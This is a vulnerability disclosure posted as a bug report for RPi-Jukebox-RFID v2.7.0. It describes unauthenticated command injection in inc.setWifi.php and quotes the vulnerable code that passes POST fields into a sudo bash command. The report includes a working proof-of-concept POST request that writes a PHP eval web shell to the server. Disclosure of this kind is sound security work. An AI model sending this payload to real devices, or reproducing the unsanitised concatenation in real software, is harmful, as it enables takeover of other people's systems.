🐛 | RPi-Jukebox-RFID V2.7_RCE_6

[xjzzzxx]

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\inc.setWifi.php

# htdocs\inc.setWifi.php
if(isset($_POST["submitWifi"]) && $_POST["submitWifi"] == "submit") {	// Line 8(Check point)
    $exec  = "bash -e <<'END'\n";
    $exec .= "source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh\n";
    $exec .= "clear_wireless_networks\n";
    $tempPOST = $_POST;			// Line 14 (Source)
    $_POST=array(); //clear
    foreach ( $tempPOST as $post_key => $post_value ) {
        unset($temp_ssid);
        unset($temp_pass);
        unset($temp_prio);
        if ( substr(trim($post_key), 0, 9) == "WIFIssid_" ) {		// Line 20(check for temp_ssid)
            $temp_ssid = trim($post_value);
            $post_key = "WIFIpass_".substr(trim($post_key), 9); // Line  22(check for temp_pass)
            $post_value = $tempPOST[$post_key];
            $temp_pass = trim($post_value);
            $post_key = "WIFIprio_".substr(trim($post_key), 9); // Line  25(check for temp_prio)
            $post_value = $tempPOST[$post_key];
            $temp_prio = trim($post_value);
            if (isset($temp_ssid) && $temp_ssid != "" && isset($temp_pass) && strlen($temp_pass) >= 8) {	// Line 28
                if(!isset($temp_prio) || !is_numeric($temp_prio)) {
                    $temp_prio = 0;
                }
                $exec .= "add_wireless_network wlan0 ".$temp_ssid." ".$temp_pass." ".$temp_prio."\n";
            }
        }
    }

    $exec .= "END\n";
    exec("sudo bash -c '". $exec . "'");	// Line 38(Sink)
}

Source from Line 14 ($_POST ) .

And then there is a check point(Line 8) ,which we should set $_POST['submitWifi'] = submit to bypass.

Finally, the sink point executed a complex concatenated command(Line 38).

Let's briefly analyze this splicing command:

sudo bash -c 'bash -e <<'END'
source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 $temp_ssid $temp_pass $temp_prio
END
'z

We have three controllable variables($temp_ssid, $temp_pass, $temp_prio), but they need to meet the corresponding checks(Line 20, Line 22, Line25 and Line 28). It can be seen that the condition we need to meet is to use KEY values with prefixes WIFIssid_, WIFIpass_, and WIFIprio_, and strlen($temp_pass) >= 8.

In addition, since we are using bash -e mode, we must ensure that all commands before controllable points can be executed correctly. That is, we need to find the correct value for $conf['scripts_abs'] which can be found in the htdocs/settings.php

# htdocs/settings.php
include("inc.header.php"); // Line 3 (init $conf['scripts_abs'])
...
include("inc.setWifi.php"); // Line 191

So we need to POST htdocs/settings. php

Poc

POST /htdocs/settings.php

Data:

submitWifi=submit&WIFIssid_123=+%7c%7c+echo+%22%3c%3fphp+%40eval(%5c%5c%5c%24_POST%5b%5c%22shell6%5c%22%5d)%3b+%3f%3e%22+%3e+.%2fshell6.php+&WIFIpass_123=%7c%7c+echo+%221%22+%7c%7c+&WIFIprio_123=1

Here is the version without url encoding for ease of understanding:

submitWifi=submit&WIFIssid_123= || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php &WIFIpass_123=|| echo "1" || &WIFIprio_123=1

The concatenated command:

sudo bash -c 'bash -e <<'END'
source /www/admin/cms.jukebox27.com_80/wwwroot/scripts/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php || echo "1" || 1
END
'

Manual verification

Logs

No response

Configuration

No response

More info

No response